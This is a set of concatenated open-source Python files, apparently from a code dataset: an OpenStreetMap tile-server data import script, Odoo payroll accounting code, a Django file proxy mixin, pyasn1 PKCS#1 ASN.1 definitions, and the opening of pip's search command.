    handle, filename = mkstemp(dir='progress', prefix=base+'-', suffix=ext)
    command = 'curl', '-s', '-o', filename, '-L', url
    print >> stderr, '+', ' '.join(command)
    process = Popen(command, stdout=stdout, stderr=PIPE)
    process.wait()
    if process.returncode:
        raise Exception('curl command returned %d' % process.returncode)
    return filename
def download_file_local(url):
    """ Treat an already-local path as downloaded: return it unchanged. """
    return url
def combine_extracts(bbox, files):
    """ Shell out to osmosis to combine extracts and pull out a bounding box.
    """
    # Build one osmosis invocation: read every extract, merge the streams
    # pairwise (one --merge per extra input), crop to bbox and write XML
    # to stdout.
    osmosis = ['osmosis']
    for file in files:
        osmosis += ['--rb', file, '--log-progress']
    osmosis += ['--merge'] * len(files[1:])
    # bbox ordering is (south, west, north, east) -> bottom/left/top/right.
    osmosis += ['--bb'] + ['%s=%.6f' % kv for kv in zip('bottom left top right'.split(), bbox)]
    osmosis += ['--wx', '-']
    handle, filename = mkstemp(dir='progress', prefix='out-', suffix='.osm.bz2')
    print >> stderr, '+', ' '.join(osmosis), '| bzip2 >', filename
    # Pipe osmosis XML output through bzip2 into the temp file.
    osmosis = Popen(osmosis, stderr=open('progress/osmosis.log', 'w'), stdout=PIPE)
    bzout = Popen(['bzip2'], stdin=osmosis.stdout, stdout=open(filename, 'w'))
    osmosis.wait()
    bzout.wait()
    if osmosis.returncode:
        raise Exception('osmosis command returned %d' % osmosis.returncode)
    if bzout.returncode:
        raise Exception('bzout command returned %d' % bzout.returncode)
    return filename
def import_extract_osm2pgsql(filename):
    """ Shell out to osm2pgsql to import extract file to Postgis.
    """
    # Remove possible existing line table to get rid of its High Road views
    psql = Popen('psql -U osm planet_osm'.split(), stdin=PIPE, stderr=PIPE, stdout=PIPE)
    psql.stdin.write('DROP TABLE IF EXISTS planet_osm_line CASCADE;')
    psql.stdin.close()
    psql.wait()
    if psql.returncode:
        raise Exception('psql command returned %d' % psql.returncode)
    # Import new OSM data
    # TODO: is it safe to ask for 4GB of RAM here? Check /proc/meminfo MemFree.
    osm2pgsql = 'osm2pgsql -smucK -C 4096 -U osm -d planet_osm -S osm2pgsql/default.style'.split()
    osm2pgsql += [filename]
    print >> stderr, '+', ' '.join(osm2pgsql)
    logfile = open('progress/osm2pgsql.log', 'w')
    osm2pgsql = Popen(osm2pgsql, stdout=logfile, stderr=logfile)
    osm2pgsql.wait()
    if osm2pgsql.returncode:
        raise Exception('osm2pgsql command returned %d' % osm2pgsql.returncode)
    # Apply new High Road views
    # NOTE(review): this fetches SQL from GitHub at run time and pipes it
    # straight into psql -- requires network access and trusts the remote.
    highroad_sql = urlopen('https://raw.github.com/nkiraly/HighRoad/master/high_road_views-setup.pgsql').read()
    psql = Popen('psql -U osm planet_osm'.split(), stdin=PIPE, stderr=PIPE, stdout=PIPE)
    psql.stdin.write(highroad_sql)
    psql.stdin.close()
    psql.wait()
    if psql.returncode:
        raise Exception('psql command returned %d' % psql.returncode)
def import_extract_imposm(filename):
    """ Shell out to imposm to import extract file to Postgis.
    """
    command = ['imposm', '--read', '--write', '--table-prefix=imposm_',
               '--connect', 'postgis://osm:@127.0.0.1/planet_osm',
               '--cache-dir=/usr/local/tiledrawer/progress', filename]
    print >> stderr, '+', ' '.join(command)
    # Both stdout and stderr go to the same progress log.
    logfile = open('progress/imposm.log', 'w')
    process = Popen(command, stdout=logfile, stderr=logfile)
    process.wait()
    if process.returncode:
        raise Exception('imposm command returned %d' % process.returncode)
def download_coastline():
    """ Download and unpack an unprojected "good" coastline from metro.teczno.com.
    """
    # Three-stage pipeline: curl fetches the tarball, bzcat decompresses it,
    # tar unpacks into progress/.
    curl = 'curl -sL http://osm-metro-extracts.s3.amazonaws.com/coastline-good-latlon.tar.bz2'.split()
    print >> stderr, '+', ' '.join(curl), '| bzcat | tar -C progress -xf -'
    curl = Popen(curl, stdout=PIPE, stderr=PIPE)
    bzcat = Popen('bzcat'.split(), stdin=curl.stdout, stdout=PIPE, stderr=PIPE)
    tar = Popen('tar -C progress -xf -'.split(), stdin=bzcat.stdout, stderr=PIPE)
    curl.wait()
    bzcat.wait()
    tar.wait()
    # Fail loudly if any stage of the pipeline failed.
    if curl.returncode:
        raise Exception('curl command returned %d' % curl.returncode)
    if bzcat.returncode:
        raise Exception('bzcat command returned %d' % bzcat.returncode)
    if tar.returncode:
        raise Exception('tar command returned %d' % tar.returncode)
    return 'progress/coastline-good.shp'
def import_coastline(filename, bbox=None):
    """ Shell out to shp2pgsql to import a coastline file to Postgis.

        The coastline file is understood to be unprojected (EPSG:4326).
    """
    # Reserve a unique output name, then delete it so ogr2ogr can create it.
    handle, extract_filename = mkstemp(dir='progress', prefix='coastline-', suffix='.shp')
    remove(extract_filename)
    # Reproject to web mercator (EPSG:3857), optionally cropping to bbox
    # (given as south, west, north, east; -spat wants xmin ymin xmax ymax).
    ogr2ogr = 'ogr2ogr -t_srs EPSG:3857'.split()
    if bbox is not None:
        ogr2ogr += ['-spat']
        ogr2ogr += map(str, [bbox[1], bbox[0], bbox[3], bbox[2]])
    ogr2ogr += [extract_filename, filename]
    print >> stderr, '+', ' '.join(ogr2ogr)
    ogr2ogr = Popen(ogr2ogr)
    ogr2ogr.wait()
    if ogr2ogr.returncode:
        raise Exception('ogr2ogr command returned %d' % ogr2ogr.returncode)
    # Pipe shp2pgsql's generated SQL into psql to (re)create the
    # 'coastline' table (-dID drops and recreates it).
    shp2pgsql = 'shp2pgsql', '-dID', '-s', '3857', extract_filename, 'coastline'
    psql = 'psql -U osm planet_osm'.split()
    print >> stderr, '+', ' '.join(shp2pgsql), '|', ' '.join(psql)
    shp2pgsql = Popen(shp2pgsql, stdout=PIPE, stderr=PIPE)
    psql = Popen(psql, stdin=shp2pgsql.stdout, stdout=PIPE, stderr=PIPE)
    shp2pgsql.wait()
    psql.wait()
    if shp2pgsql.returncode:
        raise Exception('shp2pgsql command returned %d' % shp2pgsql.returncode)
    if psql.returncode:
        raise Exception('psql command returned %d' % psql.returncode)
def import_style(url):
    """ Install the tile style referenced by *url*, dispatching on its suffix.

        Unknown suffixes are silently ignored.
    """
    if url.endswith('.zip'):
        # Zipped TileMill project: import it, then build Mapnik 2.0 so the
        # generated stylesheet can be rendered.
        import_style_tilemill(url)
        update_status('Building Mapnik 2.0 (populate.py)')
        build_mapnik2()
    elif url.endswith('.cfg'):
        # Tiledrawer Cascadenik config.
        import_style_tdcfg(url)
    elif url.endswith('.mml'):
        # Raw Cascadenik MML stylesheet.
        import_style_mml(url)
def build_mapnik2():
    """ Run the mapnik2.sh build script and wait for it to finish. """
    print >> stderr, '+ ./mapnik2.sh'
    script = Popen('./mapnik2.sh')
    script.wait()
# Mapping from known tile-drawer shapefile basenames to the PostGIS tables
# they correspond to.  A dict lookup replaces the previous 30-branch
# if/elif chain; unknown names fall through to ''.
_SHAPEFILE_TABLES = {
    'tile-drawer.osm2psgsql-polygon.shp': 'planet_osm_polygon',
    'tile-drawer.osm2psgsql-point.shp': 'planet_osm_point',
    'tile-drawer.osm2psgsql-line.shp': 'planet_osm_line',
    'tile-drawer.imposm-admin.shp': 'imposm_admin',
    'tile-drawer.imposm-aeroways.shp': 'imposm_aeroways',
    'tile-drawer.imposm-amenities.shp': 'imposm_amenities',
    'tile-drawer.imposm-buildings.shp': 'imposm_buildings',
    'tile-drawer.imposm-landusages-gen0.shp': 'imposm_landusages_gen0',
    'tile-drawer.imposm-landusages-gen1.shp': 'imposm_landusages_gen1',
    'tile-drawer.imposm-landusages.shp': 'imposm_landusages',
    'tile-drawer.imposm-mainroads-gen0.shp': 'imposm_mainroads_gen0',
    'tile-drawer.imposm-mainroads-gen1.shp': 'imposm_mainroads_gen1',
    'tile-drawer.imposm-mainroads.shp': 'imposm_mainroads',
    'tile-drawer.imposm-minorroads.shp': 'imposm_minorroads',
    'tile-drawer.imposm-motorways-gen0.shp': 'imposm_motorways_gen0',
    'tile-drawer.imposm-motorways-gen1.shp': 'imposm_motorways_gen1',
    'tile-drawer.imposm-motorways.shp': 'imposm_motorways',
    'tile-drawer.imposm-places.shp': 'imposm_places',
    'tile-drawer.imposm-railways-gen0.shp': 'imposm_railways_gen0',
    'tile-drawer.imposm-railways-gen1.shp': 'imposm_railways_gen1',
    'tile-drawer.imposm-railways.shp': 'imposm_railways',
    'tile-drawer.imposm-roads-gen0.shp': 'imposm_roads_gen0',
    'tile-drawer.imposm-roads-gen1.shp': 'imposm_roads_gen1',
    'tile-drawer.imposm-roads.shp': 'imposm_roads',
    'tile-drawer.imposm-transport-areas.shp': 'imposm_transport_areas',
    'tile-drawer.imposm-transport-points.shp': 'imposm_transport_points',
    'tile-drawer.imposm-waterareas-gen0.shp': 'imposm_waterareas_gen0',
    'tile-drawer.imposm-waterareas-gen1.shp': 'imposm_waterareas_gen1',
    'tile-drawer.imposm-waterareas.shp': 'imposm_waterareas',
    'tile-drawer.imposm-waterways.shp': 'imposm_waterways',
    'tile-drawer.coastline.shp': 'coastline',
}

def get_shapefile_tablename(filepath):
    """ Return the PostGIS table name for a known shapefile path.

        Only the basename of *filepath* is considered; unknown names
        return '' (matching the previous behavior).
    """
    return _SHAPEFILE_TABLES.get(basename(filepath), '')
def import_style_tilemill(url):
    """ Load a zipped-up stylesheet created from Tilemill.
    """
    # Fetch the zip into memory and parse the first .xml member as the
    # Mapnik stylesheet.
    archive = ZipFile(StringIO(urlopen(url).read()))
    xmlname = [name for name in archive.namelist() if name.endswith('.xml')][0]
    doc = parse(StringIO(archive.read(xmlname)))
    # Map shapefiles to PostGIS datasources.
    def add_parameter(datasource, parameter, value):
        SubElement(datasource, 'Parameter', dict(name=parameter)).text = value
    for layer in doc.findall('Layer'):
        for ds in layer.findall('Datasource'):
            params = dict( [(p.attrib['name'], p.text)
                            for p in ds.findall('Parameter')] )
            if params.get('type', None) == 'shape' and 'file' in params:
                # Rewrite each shapefile datasource to point at the matching
                # PostGIS table loaded by the import steps above.
                ds.clear()
                add_parameter(ds, 'type', 'postgis')
                add_parameter(ds, 'host', 'localhost')
                add_parameter(ds, 'user', 'osm')
                add_parameter(ds, 'dbname', 'planet_osm')
                add_parameter(ds, 'table', get_shapefile_tablename(params['file']))
                add_parameter(ds, 'extent', '-20037508,-20037508,20037508,20037508')
                add_parameter(ds, 'estimate_extent', 'false')
    # Write the rewritten stylesheet for the tile server to use.
    out = open('gunicorn/mapnik2.xml', 'w')
    out.write('<?xml version="1.0" encoding="utf-8"?>\n')
    doc.write(out)
    # Build a new TileStache configuration file.
    config = json.load(open('gunicorn/tilestache.cfg'))
    config['layers'] = {'tiles': {'provider': {}}}
    layer = config['layers']['tiles']
    layer['provider']['name'] = 'mapnik'
    layer['provider']['mapfile'] = 'mapnik2.xml'
    layer['bounds'] = dict(zip('south west north east'.split(), options.bbox))
    layer['bounds'].update(dict(low=0, high=18))
    # Preview at the bbox center.
    layer['preview'] = dict(zoom=15, lat=(options.bbox[0]/2 + options.bbox[2]/2), lon=(options.bbox[1]/2 + options.bbox[3]/2))
    # Done.
    json.dump(config, open('gunicorn/tilestache.cfg', 'w'), indent=2)
def import_style_tdcfg(url):
    """ Load a Cascadenik style and its constituent pieces from a URL.
    """
    # The .cfg is JSON describing a mapfile plus per-layer options.
    style = json.loads(urlopen(url).read())
    mapfile = urljoin(options.style, style['mapfile'])
    # Create a local style.xml file by way of a dummy mapnik.Map instance.
    mmap = mapnik.Map(1, 1)
    mmap.srs = epsg3857
    cascadenik.load_map(mmap, mapfile, 'gunicorn', verbose=False)
    mapnik.save_map(mmap, 'gunicorn/style.xml')
    # Build a new TileStache configuration file.
    config = json.load(open('gunicorn/tilestache.cfg'))
    config['layers'] = {'tiles': {'provider': {}}}
    layer = config['layers']['tiles']
    layer['provider']['name'] = 'mapnik'
    layer['provider']['mapfile'] = 'style.xml'
    layer['bounds'] = dict(zip('south west north east'.split(), options.bbox))
    layer['bounds'].update(dict(low=0, high=18))
    # Preview at the bbox center.
    layer['preview'] = dict(zoom=15, lat=(options.bbox[0]/2 + options.bbox[2]/2), lon=(options.bbox[1]/2 + options.bbox[3]/2))
    # Apply various layer options.
    for (parameter, value) in style['layer'].items():
        if parameter == 'png options' and 'palette' in value:
            # Download the referenced palette file alongside the config and
            # rewrite the option to point at the local copy.
            palette_url = urljoin(url, value['palette'])
            palette_data = urlopen(palette_url).read()
            palette_file = 'gunicorn/palette.act'
            print >> stderr, ' ', palette_file, '<--', palette_url
            open(palette_file, 'w').write(palette_data)
            value['palette'] = 'palette.act'
        layer[parameter] = value
    # Done.
    json.dump(config, open('gunicorn/tilestache.cfg', 'w'), indent=2)
def import_style_mml(url):
    """ Load a raw Cascadenik MML stylesheet from a URL.
    """
    # Create a local style.xml file by way of a dummy mapnik.Map instance.
    mmap = mapnik.Map(1, 1)
    mmap.srs = epsg3857
    cascadenik.load_map(mmap, url, 'gunicorn', verbose=False)
    mapnik.save_map(mmap, 'gunicorn/style.xml')
    # Build a new TileStache configuration file.
    config = json.load(open('gunicorn/tilestache.cfg'))
    config['layers'] = {'tiles': {'provider': {}}}
    layer = config['layers']['tiles']
    layer['provider']['name'] = 'mapnik'
    layer['provider']['mapfile'] = 'style.xml'
    layer['bounds'] = dict(zip('south west north east'.split(), options.bbox))
    layer['bounds'].update(dict(low=0, high=18))
    # Preview at the bbox center.
    layer['preview'] = dict(zoom=15, lat=(options.bbox[0]/2 + options.bbox[2]/2), lon=(options.bbox[1]/2 + options.bbox[3]/2))
    # Done.
    json.dump(config, open('gunicorn/tilestache.cfg', 'w'), indent=2)
def update_status(message):
"""
"""
status_file = open('/usr/local/tiledrawer/progress/status.txt', 'a')
status_ts = strftime('%a %b %d %H:%M:%S %Z %Y')
print "%s %s" % ( status_ts, message )
print >> status_file, status_ts, message
if __name__ == '__main__':
    options, urls = parser.parse_args()
    # Run relative to this script's own directory so hard-coded relative
    # paths ('progress', 'gunicorn', 'postgres') resolve correctly.
    if dirname(__file__):
        print >> stderr, '+ chdir', dirname(__file__)
        chdir(dirname(__file__))
    try:
        update_status('Preparing database (populate.py)')
        # Import the null datasets first to (re)create empty tables and views.
        import_extract_osm2pgsql('postgres/init-data/null.osm')
        import_coastline('postgres/init-data/null.shp')
        update_status('Importing map style (populate.py)')
        import_style(options.style)
        update_status('Importing OpenStreetMap data (populate.py)')
        # Download each extract URL, merge and crop them, then load the
        # result through both importers.
        osm_files = map(download_file, urls)
        osm_filename = combine_extracts(options.bbox, osm_files)
        import_extract_osm2pgsql(osm_filename)
        import_extract_imposm(osm_filename)
        update_status('Importing coastline data (populate.py)')
        coast_filename = download_coastline()
        import_coastline(coast_filename, options.bbox)
    except Exception as ex:
        # Record the failure in the status log and exit nonzero.
        update_status("populate.py exception: %s" % ex)
        traceback.print_exc(file=sys.stdout)
        exit(1)
    else:
        update_status('Finished (populate.py)')
| bsd-2-clause |
suhe/odoo | addons/hr_payroll_account/hr_payroll_account.py | 17 | 10205 | #-*- coding:utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from openerp import api
from openerp.osv import fields, osv
from openerp.tools import float_compare, float_is_zero
from openerp.tools.translate import _
from openerp.exceptions import UserError
class hr_payslip_line(osv.osv):
    '''
    Payslip Line
    '''
    _inherit = 'hr.payslip.line'

    def _get_partner_id(self, cr, uid, payslip_line, credit_account, context=None):
        """
        Get partner_id of slip line to use in account_move_line
        """
        # use partner of salary rule or fallback on employee's address
        partner_id = payslip_line.salary_rule_id.register_id.partner_id.id or \
            payslip_line.slip_id.employee_id.address_home_id.id
        # The credit and debit branches only differ in which account's
        # internal_type is inspected, so pick the account first.
        rule = payslip_line.salary_rule_id
        account = rule.account_credit if credit_account else rule.account_debit
        if rule.register_id.partner_id or \
                account.internal_type in ('receivable', 'payable'):
            return partner_id
        return False
class hr_payslip(osv.osv):
    '''
    Pay Slip

    Extends hr.payslip with the accounting side of payroll: each slip is
    linked to a salary journal and, once processed, to the account move
    generated from its salary rule lines.
    '''
    _inherit = 'hr.payslip'
    _description = 'Pay Slip'

    _columns = {
        # Accounting date of the generated move; empty means date_to is used
        'date': fields.date('Date Account', states={'draft': [('readonly', False)]}, readonly=True, help="Keep empty to use the period of the validation(Payslip) date."),
        'journal_id': fields.many2one('account.journal', 'Salary Journal',states={'draft': [('readonly', False)]}, readonly=True, required=True),
        'move_id': fields.many2one('account.move', 'Accounting Entry', readonly=True, copy=False),
    }

    def _get_default_journal(self, cr, uid, context=None):
        # Default salary journal: the first journal of type 'general', if any.
        journal_obj = self.pool.get('account.journal')
        res = journal_obj.search(cr, uid, [('type', '=', 'general')])
        if res:
            return res[0]
        return False

    _defaults = {
        'journal_id': _get_default_journal,
    }

    def create(self, cr, uid, vals, context=None):
        # Allow forcing the salary journal through the context (used e.g.
        # when payslips are generated from a payslip run).
        if context is None:
            context = {}
        if 'journal_id' in context:
            vals.update({'journal_id': context.get('journal_id')})
        return super(hr_payslip, self).create(cr, uid, vals, context=context)

    def onchange_contract_id(self, cr, uid, ids, date_from, date_to, employee_id=False, contract_id=False, context=None):
        # Old-API onchange: take the journal from the selected contract, or
        # fall back to the default general journal when no contract is set.
        contract_obj = self.pool.get('hr.contract')
        res = super(hr_payslip, self).onchange_contract_id(cr, uid, ids, date_from=date_from, date_to=date_to, employee_id=employee_id, contract_id=contract_id, context=context)
        journal_id = contract_id and contract_obj.browse(cr, uid, contract_id, context=context).journal_id.id or (not contract_id and self._get_default_journal(cr, uid, context=None))
        res['value'].update({'journal_id': journal_id})
        return res

    @api.onchange('contract_id')
    def onchange_contract(self):
        # New-API counterpart of onchange_contract_id().
        super(hr_payslip, self).onchange_contract()
        self.journal_id = self.contract_id and self.contract_id.journal_id.id or (not self.contract_id and self._get_default_journal())
        return

    def cancel_sheet(self, cr, uid, ids, context=None):
        # Cancel posted moves and delete all moves linked to the slips before
        # cancelling the slips themselves.
        move_pool = self.pool.get('account.move')
        move_ids = []
        move_to_cancel = []
        for slip in self.browse(cr, uid, ids, context=context):
            if slip.move_id:
                move_ids.append(slip.move_id.id)
                if slip.move_id.state == 'posted':
                    move_to_cancel.append(slip.move_id.id)
        move_pool.button_cancel(cr, uid, move_to_cancel, context=context)
        move_pool.unlink(cr, uid, move_ids, context=context)
        return super(hr_payslip, self).cancel_sheet(cr, uid, ids, context=context)

    def process_sheet(self, cr, uid, ids, context=None):
        # For every slip, build one account move out of its salary rule lines
        # (a debit and/or credit line per rule), balance it with an adjustment
        # line when needed, post it, and link it back to the slip.
        move_pool = self.pool.get('account.move')
        hr_payslip_line_pool = self.pool['hr.payslip.line']
        precision = self.pool.get('decimal.precision').precision_get(cr, uid, 'Payroll')
        for slip in self.browse(cr, uid, ids, context=context):
            line_ids = []
            debit_sum = 0.0
            credit_sum = 0.0
            date = slip.date or slip.date_to
            name = _('Payslip of %s') % (slip.employee_id.name)
            move = {
                'narration': name,
                'ref': slip.number,
                'journal_id': slip.journal_id.id,
                'date': date,
            }
            for line in slip.details_by_salary_rule_category:
                # Credit notes invert the sign of every amount
                amt = slip.credit_note and -line.total or line.total
                if float_is_zero(amt, precision_digits=precision):
                    continue
                debit_account_id = line.salary_rule_id.account_debit.id
                credit_account_id = line.salary_rule_id.account_credit.id
                if debit_account_id:
                    debit_line = (0, 0, {
                        'name': line.name,
                        'partner_id': hr_payslip_line_pool._get_partner_id(cr, uid, line, credit_account=False, context=context),
                        'account_id': debit_account_id,
                        'journal_id': slip.journal_id.id,
                        'date': date,
                        'debit': amt > 0.0 and amt or 0.0,
                        'credit': amt < 0.0 and -amt or 0.0,
                        'analytic_account_id': line.salary_rule_id.analytic_account_id and line.salary_rule_id.analytic_account_id.id or False,
                        'tax_line_id': line.salary_rule_id.account_tax_id and line.salary_rule_id.account_tax_id.id or False,
                    })
                    line_ids.append(debit_line)
                    debit_sum += debit_line[2]['debit'] - debit_line[2]['credit']

                if credit_account_id:
                    credit_line = (0, 0, {
                        'name': line.name,
                        'partner_id': hr_payslip_line_pool._get_partner_id(cr, uid, line, credit_account=True, context=context),
                        'account_id': credit_account_id,
                        'journal_id': slip.journal_id.id,
                        'date': date,
                        'debit': amt < 0.0 and -amt or 0.0,
                        'credit': amt > 0.0 and amt or 0.0,
                        'analytic_account_id': line.salary_rule_id.analytic_account_id and line.salary_rule_id.analytic_account_id.id or False,
                        'tax_line_id': line.salary_rule_id.account_tax_id and line.salary_rule_id.account_tax_id.id or False,
                    })
                    line_ids.append(credit_line)
                    credit_sum += credit_line[2]['credit'] - credit_line[2]['debit']

            # Balance the move with an adjustment line on the journal's
            # default account when total debits and credits differ.
            if float_compare(credit_sum, debit_sum, precision_digits=precision) == -1:
                acc_id = slip.journal_id.default_credit_account_id.id
                if not acc_id:
                    raise UserError(_('The Expense Journal "%s" has not properly configured the Credit Account!') % (slip.journal_id.name))
                adjust_credit = (0, 0, {
                    'name': _('Adjustment Entry'),
                    'partner_id': False,
                    'account_id': acc_id,
                    'journal_id': slip.journal_id.id,
                    'date': date,
                    'debit': 0.0,
                    'credit': debit_sum - credit_sum,
                })
                line_ids.append(adjust_credit)

            elif float_compare(debit_sum, credit_sum, precision_digits=precision) == -1:
                acc_id = slip.journal_id.default_debit_account_id.id
                if not acc_id:
                    raise UserError(_('The Expense Journal "%s" has not properly configured the Debit Account!') % (slip.journal_id.name))
                adjust_debit = (0, 0, {
                    'name': _('Adjustment Entry'),
                    'partner_id': False,
                    'account_id': acc_id,
                    'journal_id': slip.journal_id.id,
                    'date': date,
                    'debit': credit_sum - debit_sum,
                    'credit': 0.0,
                })
                line_ids.append(adjust_debit)

            move.update({'line_ids': line_ids})
            move_id = move_pool.create(cr, uid, move, context=context)
            self.write(cr, uid, [slip.id], {'move_id': move_id, 'date' : date}, context=context)
            move_pool.post(cr, uid, [move_id], context=context)
        # NOTE(review): this relies on the for-loop variable `slip` leaking out
        # of the loop, so super() only receives the LAST slip id -- looks
        # suspicious; confirm against upstream before changing.
        return super(hr_payslip, self).process_sheet(cr, uid, [slip.id], context=context)
class hr_salary_rule(osv.osv):
    """Salary rule extended with the accounting configuration used when
    generating the payslip's account move lines."""
    _inherit = 'hr.salary.rule'

    _columns = {
        # Analytic account attached to the generated move lines
        'analytic_account_id':fields.many2one('account.analytic.account', 'Analytic Account', domain=[('account_type', '=', 'normal')]),
        # Tax linked to the generated move lines (tax_line_id)
        'account_tax_id':fields.many2one('account.tax', 'Tax'),
        # Accounts used for the debit/credit side of the rule's amounts
        'account_debit': fields.many2one('account.account', 'Debit Account', domain=[('deprecated', '=', False)]),
        'account_credit': fields.many2one('account.account', 'Credit Account', domain=[('deprecated', '=', False)]),
    }
class hr_contract(osv.osv):
    """Employee contract extended with payroll accounting settings."""
    _inherit = 'hr.contract'
    _description = 'Employee Contract'

    _columns = {
        # Analytic account used for this contract's payroll entries
        'analytic_account_id':fields.many2one('account.analytic.account', 'Analytic Account', domain=[('account_type', '=', 'normal')]),
        # Journal used for the payslips generated from this contract
        'journal_id': fields.many2one('account.journal', 'Salary Journal'),
    }
class hr_payslip_run(osv.osv):
    """Payslip batch extended with the salary journal propagated to the
    slips generated from the batch."""
    _inherit = 'hr.payslip.run'
    _description = 'Payslip Run'

    _columns = {
        'journal_id': fields.many2one('account.journal', 'Salary Journal', states={'draft': [('readonly', False)]}, readonly=True, required=True),
    }

    def _get_default_journal(self, cr, uid, context=None):
        # Default salary journal: the first journal of type 'general', if any.
        journal_obj = self.pool.get('account.journal')
        res = journal_obj.search(cr, uid, [('type', '=', 'general')])
        if res:
            return res[0]
        return False

    _defaults = {
        'journal_id': _get_default_journal,
    }
| gpl-3.0 |
class FileProxyMixin(object):
    """
    A mixin class used to forward file methods to an underlaying file
    object. The internal file object has to be called "file"::

        class FileProxy(FileProxyMixin):
            def __init__(self, file):
                self.file = file
    """

    def _delegate(name):
        # Build a read-only property forwarding attribute *name* to self.file.
        return property(lambda self: getattr(self.file, name))

    encoding = _delegate('encoding')
    fileno = _delegate('fileno')
    flush = _delegate('flush')
    isatty = _delegate('isatty')
    newlines = _delegate('newlines')
    read = _delegate('read')
    readinto = _delegate('readinto')
    readline = _delegate('readline')
    readlines = _delegate('readlines')
    seek = _delegate('seek')
    softspace = _delegate('softspace')
    tell = _delegate('tell')
    truncate = _delegate('truncate')
    write = _delegate('write')
    writelines = _delegate('writelines')
    xreadlines = _delegate('xreadlines')

    # The helper is only needed while the class body executes.
    del _delegate

    def __iter__(self):
        return iter(self.file)
| apache-2.0 |
axbaretto/beam | sdks/python/.tox/docs/lib/python2.7/site-packages/pyasn1_modules/rfc2437.py | 127 | 2378 | #
# PKCS#1 syntax
#
# ASN.1 source from:
# ftp://ftp.rsasecurity.com/pub/pkcs/pkcs-1/pkcs-1v2.asn
#
# Sample captures could be obtained with "openssl genrsa" command
#
from pyasn1.type import tag, namedtype, namedval, univ, constraint
from pyasn1_modules.rfc2459 import AlgorithmIdentifier
# Object identifier arc for PKCS#1: 1.2.840.113549.1.1
pkcs_1 = univ.ObjectIdentifier('1.2.840.113549.1.1')

# RSA encryption and signature algorithm identifiers under the PKCS#1 arc
rsaEncryption = univ.ObjectIdentifier('1.2.840.113549.1.1.1')
md2WithRSAEncryption = univ.ObjectIdentifier('1.2.840.113549.1.1.2')
md4WithRSAEncryption = univ.ObjectIdentifier('1.2.840.113549.1.1.3')
md5WithRSAEncryption = univ.ObjectIdentifier('1.2.840.113549.1.1.4')
sha1WithRSAEncryption = univ.ObjectIdentifier('1.2.840.113549.1.1.5')

# RSAES-OAEP and its supporting function identifiers
rsaOAEPEncryptionSET = univ.ObjectIdentifier('1.2.840.113549.1.1.6')
id_RSAES_OAEP = univ.ObjectIdentifier('1.2.840.113549.1.1.7')
id_mgf1 = univ.ObjectIdentifier('1.2.840.113549.1.1.8')
id_pSpecified = univ.ObjectIdentifier('1.2.840.113549.1.1.9')

# SHA-1 hash algorithm identifier (OIW arc)
id_sha1 = univ.ObjectIdentifier('1.3.14.3.2.26')

# Upper bound placeholder used by the ASN.1 module
MAX = 16
# Version number of the RSA key syntax (INTEGER)
class Version(univ.Integer): pass
class RSAPrivateKey(univ.Sequence):
    """RSAPrivateKey ::= SEQUENCE -- PKCS#1 two-prime RSA private key,
    including the CRT parameters (exponent1/exponent2/coefficient)."""
    componentType = namedtype.NamedTypes(
        namedtype.NamedType('version', Version()),
        namedtype.NamedType('modulus', univ.Integer()),
        namedtype.NamedType('publicExponent', univ.Integer()),
        namedtype.NamedType('privateExponent', univ.Integer()),
        namedtype.NamedType('prime1', univ.Integer()),
        namedtype.NamedType('prime2', univ.Integer()),
        namedtype.NamedType('exponent1', univ.Integer()),
        namedtype.NamedType('exponent2', univ.Integer()),
        namedtype.NamedType('coefficient', univ.Integer())
    )
class RSAPublicKey(univ.Sequence):
    """RSAPublicKey ::= SEQUENCE { modulus, publicExponent }."""
    componentType = namedtype.NamedTypes(
        namedtype.NamedType('modulus', univ.Integer()),
        namedtype.NamedType('publicExponent', univ.Integer())
    )
# NOTE: PKCS#1 specifies DEFAULT values for these fields (SHA-1, MGF1 with
# SHA-1, empty label), but they are not set on this definition.
class RSAES_OAEP_params(univ.Sequence):
    """RSAES-OAEP-params ::= SEQUENCE of hash, mask-generation and
    label-source algorithm identifiers (context tags [0], [1], [2])."""
    componentType = namedtype.NamedTypes(
        namedtype.NamedType('hashFunc', AlgorithmIdentifier().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 0))),
        namedtype.NamedType('maskGenFunc', AlgorithmIdentifier().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 1))),
        namedtype.NamedType('pSourceFunc', AlgorithmIdentifier().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 2)))
    )
| apache-2.0 |
rest-of/the-deck | lambda/lib/python2.7/site-packages/pip/commands/search.py | 64 | 4777 | from __future__ import absolute_import
import logging
import sys
import textwrap
from pip.basecommand import Command, SUCCESS
from pip.download import PipXmlrpcTransport
from pip.models import PyPI
from pip.utils import get_terminal_size
from pip.utils.logging import indent_log
from pip.exceptions import CommandError
from pip.status_codes import NO_MATCHES_FOUND
from pip._vendor import pkg_resources
from pip._vendor.six.moves import xmlrpc_client
logger = logging.getLogger(__name__)
class SearchCommand(Command):
    """Search for PyPI packages whose name or summary contains <query>."""
    name = 'search'
    usage = """
%prog [options] <query>"""
    summary = 'Search PyPI for packages.'

    def __init__(self, *args, **kw):
        super(SearchCommand, self).__init__(*args, **kw)
        # --index lets the user point the XML-RPC search at another index
        self.cmd_opts.add_option(
            '--index',
            dest='index',
            metavar='URL',
            default=PyPI.pypi_url,
            help='Base URL of Python Package Index (default %default)')

        self.parser.insert_option_group(0, self.cmd_opts)

    def run(self, options, args):
        # Entry point: query the index, reshape the hits, print them.
        if not args:
            raise CommandError('Missing required argument (search query).')
        query = args
        pypi_hits = self.search(query, options)
        hits = transform_hits(pypi_hits)

        # Only wrap output to the terminal width when attached to a TTY
        terminal_width = None
        if sys.stdout.isatty():
            terminal_width = get_terminal_size()[0]

        print_results(hits, terminal_width=terminal_width)
        if pypi_hits:
            return SUCCESS
        return NO_MATCHES_FOUND

    def search(self, query, options):
        # Run the XML-RPC 'search' call against the configured index,
        # matching the query against either name or summary.
        index_url = options.index
        with self._build_session(options) as session:
            transport = PipXmlrpcTransport(index_url, session)
            pypi = xmlrpc_client.ServerProxy(index_url, transport)
            hits = pypi.search({'name': query, 'summary': query}, 'or')
            return hits
def transform_hits(hits):
    """
    The list from pypi is really a list of versions. We want a list of
    packages with the list of versions stored inline. This converts the
    list from pypi into one we can use.

    Each input hit is a dict with 'name', 'summary', 'version' and
    '_pypi_ordering' keys; the result is a list of per-package dicts with
    'name', 'summary', 'versions' and 'score', sorted by score descending.
    """
    packages = {}
    for hit in hits:
        name = hit['name']
